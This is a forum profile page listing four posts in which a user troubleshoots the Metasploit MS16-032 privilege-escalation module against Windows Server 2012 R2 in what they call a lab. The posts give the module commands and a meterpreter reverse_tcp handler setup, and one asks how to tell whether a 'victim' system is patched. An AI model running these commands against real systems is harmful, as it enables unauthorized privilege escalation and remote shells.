Jump to content

ezejuf

Members
  • Posts

    4
  • Joined

  • Last visited

Everything posted by ezejuf

  1. ezejuf

    ms16-032

    alright thats it ... thank you
  2. ezejuf

    ms16-032

    ah ok ... probably cause its patched :D ... i scanned it with nmap ... what should i look for ... is there a way to know is the victims os is fully updated ?
  3. ezejuf

    ms16-032

    hey ... well yes i tried ... use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost "mylocalip" exploit it just gives the message started reverse tcp handler on 0.0.0.0:4444 and hangs there
  4. ezejuf

    ms16-032

    hello everyone , im new to this so please bare with i have a lab environment with a windows server 2012 r2 that im trying to perform ms16-032 on it ... i go to kali linux ... start msfconsole and follow the steps 1 - use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2- set target 1 ( x64) 3- set session 1 4- exploit and i get this error exploit failed: Msf::OptionValidateError the following options failed to validate : SESSION. what should i do ? lhost is set to the ip of my kali linux machine and port is set to 4444 help please
×
×
  • Create New...